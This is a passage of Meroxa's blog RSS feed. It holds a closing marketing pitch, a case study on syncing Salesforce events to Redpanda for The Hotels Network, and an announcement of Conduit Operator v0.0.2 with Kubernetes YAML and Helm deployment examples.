&lt;p&gt;An e-commerce platform used Meroxa’s Conduit Platform to synchronize inventory data across warehouses in real time. This enabled &lt;strong&gt;95% accuracy in stock levels&lt;/strong&gt;, minimizing missed sales and overstocking.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Personalized Customer Engagement&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A streaming service processed user behavior data with Conduit, achieving &lt;strong&gt;85% faster recommendation updates&lt;/strong&gt;, leading to a &lt;strong&gt;30% increase in customer engagement&lt;/strong&gt; and retention rates.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Meroxa vs. Fivetran: A Performance Comparison&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/compet_table_fivetran.png&quot; alt=&quot;compet_table_fivetran.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Unlock Real-Time Data Movement at Scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform offers unmatched real-time data movement performance, giving you the speed, flexibility, and scalability to stay ahead of the competition. Whether you’re optimizing fraud detection, inventory management, or customer engagement, Conduit delivers the power you need to make data-driven decisions faster and more efficiently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Experience performance at scale and control your data destiny—choose Meroxa.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up today!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Case Study: Streamlining Data Flow for The Hotels Network with Meroxa]]></title><description><![CDATA[The Hotels Network (THN) partnered with Meroxa to streamline data flow between their sales and support teams, overcoming siloed data and complex architecture challenges. Using Meroxa’s Conduit Platform, THN achieved a unified, real-time pipeline from Salesforce to Redpanda, reducing operational costs by 30% and enhancing customer support capabilities. The solution’s scalability ensures THN can continue to grow and optimize operations seamlessly.]]></description><link>https://meroxa.com/blog/case-study-streamlining-data-flow-for-the-hotels-network-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/case-study-streamlining-data-flow-for-the-hotels-network-with-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 13 Nov 2024 01:15:54 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Client Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Hotels Network (THN) is a leading technology company in the hospitality sector, offering innovative tools to enhance guest experiences and optimize revenue. THN approached us to help address a critical challenge—managing the data silo between their sales and support teams. This disconnect was hindering their ability to operate efficiently and gain a unified view of customer interactions. By streamlining their data flows and integrating their systems, we were able to bridge the gap between sales and support, ultimately increasing THN&apos;s operational efficiency and enhancing its ability to deliver a seamless customer experience.&lt;/p&gt;
&lt;p&gt;In the face of rising costs and operational complexity, THN needed a more streamlined solution that would support and scale their daily volume efficiently without compromising security.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Challenges&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Hotels Network (THN) faced significant challenges due to fragmented insights and disconnected data streams between their sales and support teams. This &lt;strong&gt;siloed data&lt;/strong&gt; made it difficult to achieve a unified view of customer interactions and hindered efficient communication. Their &lt;strong&gt;complex architecture&lt;/strong&gt;, built on multiple data streaming services, added layers of cost and complexity, making it hard to manage and scale effectively. On top of this, the organization needed to handle &lt;strong&gt;high volumes&lt;/strong&gt; of data, processing around 100 daily events, each with numerous data elements, which created operational bottlenecks and inefficiencies. These challenges underscored the need for a streamlined, integrated approach to data management that could support both high throughput and seamless cross-functional insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Solution Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa provided THN with a comprehensive data integration solution using its &lt;strong&gt;Conduit Platform&lt;/strong&gt; to streamline the flow of data between Salesforce and Redpanda. By creating a unified pipeline, Meroxa simplified the architecture, reducing operational costs and providing real-time updates.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/meroxa_connector.png&quot; alt=&quot;meroxa_connector.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Components of the Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Salesforce Integration&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa set up a Salesforce trigger and platform event configuration to publish key events in real-time.&lt;/li&gt;
&lt;li&gt;This ensured that customer interactions and property data were kept up-to-date without manual interventions, improving the overall flow of data from the sales to the support teams.&lt;/li&gt;
&lt;li&gt;We configured the Salesforce platform event to publish different event types, and Meroxa handled them as expected using multiple topics.&lt;/li&gt;
&lt;li&gt;Meroxa adapted the JSON format published to Redpanda to the specifications of the customer&apos;s team, which helped keep the JSON notation consistent with other integrated systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Redpanda Cluster Setup&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa configured a Redpanda cluster, managing topics with secure Access Control Lists (ACL) and authentication mechanisms to protect data and ensure seamless, secure connections between the systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Conduit Platform&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The entire pipeline was managed using Meroxa’s platform, which consumed Salesforce events and streamed them into Redpanda. Secrets management for secure credentials and connection monitoring was handled through Meroxa, providing a centralized and reliable data flow infrastructure.&lt;/li&gt;
&lt;li&gt;The solution was designed to support THN’s current data volume and had the flexibility to scale as their business grows.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
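&lt;p&gt;Conceptually, the components above collapse into a single source-to-destination pipeline. The sketch below is illustrative only: the connector plugins, event and topic names, and broker address are assumptions, and credentials would be injected through the platform&apos;s secrets management rather than inlined in the file.&lt;/p&gt;

```yaml
# Hypothetical sketch: Salesforce platform events streamed into Redpanda.
# Plugin names, event/topic names, and addresses are illustrative assumptions.
version: "2.2"
pipelines:
  - id: salesforce-to-redpanda
    status: running
    connectors:
      - id: salesforce-events
        type: source
        plugin: "salesforce"                      # assumed Salesforce source connector
        settings:
          topicNames: "/event/Account_Update__e"  # assumed platform event name
      - id: redpanda-topic
        type: destination
        plugin: "kafka"                           # Redpanda speaks the Kafka protocol
        settings:
          servers: "redpanda.internal:9092"       # assumed broker address
          topic: "salesforce.events"              # assumed destination topic
```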
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Implementation Timeline&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Phase 1&lt;/strong&gt;: Initial consultation and requirements gathering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 2&lt;/strong&gt;: Salesforce and Redpanda integration setup (1 week).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 3&lt;/strong&gt;: Testing and troubleshooting (2 weeks).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 4&lt;/strong&gt;: Full deployment and production (within 1 month from project start).&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;&quot;The Meroxa team worked with us to design, build &amp;#x26; deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform.&quot;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;David Sanchez Carmona&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Senior GTM Systems Manager&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Results and Benefits&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Improved Data Flow&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;With the consolidated data pipeline, THN eliminated siloed data between Salesforce and Redpanda, achieving a unified, seamless data flow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data updates are now processed in real-time&lt;/strong&gt;, enabling faster response times and improved service levels.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reduced Operational Costs&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;By streamlining its architecture and eliminating the need for multiple data streaming services, THN reduced operational complexity and cut costs by up to &lt;strong&gt;30%&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Insights&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Real-time data streaming from Salesforce into Redpanda allowed THN to make informed decisions quickly, enhancing customer support with more timely responses to customer interactions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The solution provided by Meroxa offers a flexible and scalable platform, allowing THN to handle current data volumes and easily expand as their needs grow.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/redpanda_JSON_messages.png&quot; alt=&quot;redpanda_JSON_messages.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;&quot;By publishing event messages in Salesforce&apos;s Apex to Meroxa, we&apos;ve enabled our Client Success team to speed up the onboarding process for new clients and a more reduced number of data entry issues&quot;.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;David Sanchez Carmona&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Senior GTM Systems Manager&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform has transformed THN’s data architecture by providing a streamlined, scalable, and cost-effective solution to manage their data flow between Salesforce and Redpanda. With real-time insights, reduced complexity, and lower operational costs, THN is now positioned to enhance its customer service capabilities and optimize its operations for future growth.&lt;/p&gt;
&lt;p&gt;By consolidating multiple services into a single, efficient pipeline, THN can continue to innovate and scale, with a future-proof infrastructure capable of adapting to their evolving needs.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Operator v0.0.2 with Schema Registry Support!]]></title><description><![CDATA[We’re excited to introduce the latest update to the Conduit Operator, now with built-in schema registry support. This new feature allows seamless data encoding and decoding, improving data compatibility across your pipelines. Whether you're managing multiple Conduit instances or scaling your data operations, schema registry integration ensures a smoother, more reliable experience for handling complex data flows.]]></description><link>https://meroxa.com/blog/conduit-operator-v002-with-schema-registry-support</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-operator-v002-with-schema-registry-support</guid><dc:creator><![CDATA[Lyubo Kamenov]]></dc:creator><pubDate>Fri, 25 Oct 2024 03:47:02 GMT</pubDate><content:encoded>&lt;p&gt;We are thrilled to announce the release of &lt;strong&gt;Conduit Operator v0.0.2&lt;/strong&gt;, designed to simplify the management and orchestration of Conduit instances within Kubernetes.&lt;/p&gt;
&lt;h1&gt;What Is the Conduit Operator?&lt;/h1&gt;
&lt;p&gt;The &lt;strong&gt;Conduit Operator&lt;/strong&gt; extends the Kubernetes API, allowing users to manage Conduit instances as custom resources. These resources define how each Conduit pipeline is provisioned and managed throughout its lifecycle, giving you full control over your data flow while leveraging Kubernetes-native features like scaling, monitoring, and logging.&lt;/p&gt;
&lt;p&gt;Conduit pipelines can be declared using YAML configuration, much like how any other Kubernetes resources are configured and deployed. This flexibility allows you to integrate your data streaming processes into existing DevOps workflows and infrastructure management tools with ease.&lt;/p&gt;
&lt;h3&gt;A Glimpse into Conduit Custom Resources&lt;/h3&gt;
&lt;p&gt;Conduit pipelines are represented as Kubernetes custom resources, where each pipeline runs as its own distinct Conduit instance. Below is a basic example of how a Conduit pipeline is defined:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;apiVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; operator.conduit.io/v1alpha
&lt;span class=&quot;token key atrule&quot;&gt;kind&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Conduit
&lt;span class=&quot;token key atrule&quot;&gt;metadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator
&lt;span class=&quot;token key atrule&quot;&gt;spec&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;running&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator.log
  &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator pipeline
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.type
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.id
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.name
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.company
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; format.options.trial
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;bool&quot;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; recordCount
          &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;3&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This configuration provides a declarative way to manage data pipelines, reducing the manual overhead typically required to build and manage streaming architectures.&lt;/p&gt;
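&lt;p&gt;Once saved to a file (assumed here to be named &lt;code class=&quot;language-text&quot;&gt;conduit-generator.yaml&lt;/code&gt;), the resource can be created and inspected with standard Kubernetes tooling, provided the operator is already installed in the cluster:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# Create the pipeline resource defined above
kubectl apply -f conduit-generator.yaml

# Inspect the Conduit resource and its status
kubectl get conduit conduit-generator&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;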
&lt;h3&gt;Streamlining Connector Management&lt;/h3&gt;
&lt;p&gt;Using standalone connectors with the Conduit Operator is simpler as well: they can be hot-loaded from GitHub repositories rather than baked into the instance image.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# github.com/conduitio/conduit-connector-generator will be built and loaded&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;# by the operator.&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduitio/conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator
  &lt;span class=&quot;token key atrule&quot;&gt;pluginVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; v0.8.0
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The operator automatically provisions and manages the necessary resources to run the connectors. These connectors, sourced from organizations like &lt;strong&gt;conduitio&lt;/strong&gt;, &lt;strong&gt;meroxa&lt;/strong&gt;, and &lt;strong&gt;conduitio-labs&lt;/strong&gt;, provide out-of-the-box integrations with popular systems.&lt;/p&gt;
&lt;h3&gt;Schema Support for Enhanced Data Handling&lt;/h3&gt;
&lt;p&gt;As of Conduit v0.11.0, the platform supports schema registries, which allows connectors to encode and decode data using predefined schemas. This enables more robust data management and ensures compatibility between different data systems.&lt;/p&gt;
&lt;p&gt;An example configuration for utilizing a schema registry looks like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;apiVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; operator.conduit.io/v1alpha
&lt;span class=&quot;token key atrule&quot;&gt;kind&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Conduit
&lt;span class=&quot;token key atrule&quot;&gt;metadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;generator&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry
&lt;span class=&quot;token key atrule&quot;&gt;spec&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;schemaRegistry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//apicurio&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;8080/apis/ccompat/v7
    &lt;span class=&quot;token key atrule&quot;&gt;basicAuthUser&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;schemaUser&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;basicAuthPassword&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;secretRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;password
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;registry&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;secret
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This level of flexibility is essential for businesses dealing with large-scale data integrations, as it allows multiple Conduit instances to share a schema registry across different environments and scale pipelines independently.&lt;/p&gt;
&lt;h3&gt;Deploying Conduit Operator&lt;/h3&gt;
&lt;p&gt;Deployment of the Conduit Operator can be done via Helm, a popular Kubernetes package manager. By using Helm charts, you can easily manage deployments, scaling, and updates of Conduit instances within your Kubernetes clusters.&lt;/p&gt;
&lt;p&gt;To deploy the operator, you can simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;helm repo &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; conduit https://conduitio.github.io/conduit-operator
helm &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; conduit-operator &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
    conduit/conduit-operator --create-namespace &lt;span class=&quot;token parameter variable&quot;&gt;-n&lt;/span&gt; conduit-operator
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
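&lt;p&gt;Once the chart is installed, a quick sanity check confirms the operator pod is running and its custom resource definitions are registered (exact resource names may vary between chart versions):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# Verify the operator deployment
kubectl get pods -n conduit-operator

# Confirm the Conduit CRDs were installed
kubectl get crds | grep -i conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;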
&lt;h3&gt;Monitoring and Scaling with Kubernetes&lt;/h3&gt;
&lt;p&gt;One of the key advantages of the Conduit Operator is its integration with Kubernetes-native features. For example, you can add annotations to your Conduit instances to automatically scrape metrics using Prometheus:&lt;/p&gt;
&lt;p&gt;This is achieved by customizing the Helm values file when deploying the operator. Future work will allow these annotations to be placed directly on the Conduit resource.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# Create values.yaml using these settings&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;controller&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;conduitMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;podAnnotations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/scrape&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;true&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; /metrics
      &lt;span class=&quot;token key atrule&quot;&gt;prometheus.io/port&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;8080&quot;&lt;/span&gt;
      
&lt;span class=&quot;token comment&quot;&gt;# Install or upgrade the operator via helm&lt;/span&gt;
helm install conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator \
    conduit/conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;create&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;namespace &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;n conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;operator \
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;f values.yaml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This seamless integration enables robust monitoring and scaling options, ensuring your data pipelines are optimized for performance and reliability.&lt;/p&gt;
&lt;h3&gt;Why Use Conduit Platform?&lt;/h3&gt;
&lt;p&gt;While the &lt;strong&gt;Conduit Operator&lt;/strong&gt; offers a robust solution for managing data pipelines within Kubernetes, the &lt;strong&gt;Conduit Platform&lt;/strong&gt; takes this further by providing a &lt;strong&gt;low-code experience&lt;/strong&gt; and additional &lt;strong&gt;enterprise features&lt;/strong&gt;. With the Conduit Platform, you can easily build, monitor, and scale complex data pipelines with minimal manual effort.&lt;/p&gt;
&lt;p&gt;Key advantages of using the Conduit Platform include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Low-Code Interface&lt;/strong&gt;: Quickly configure and manage pipelines without extensive coding.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enterprise Features&lt;/strong&gt;: Enhanced security, monitoring, and scaling options tailored for large-scale enterprise needs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Workflows&lt;/strong&gt;: Easily connect disparate data sources and sinks, optimizing data flow across your infrastructure.&lt;/li&gt;
&lt;/ul&gt;
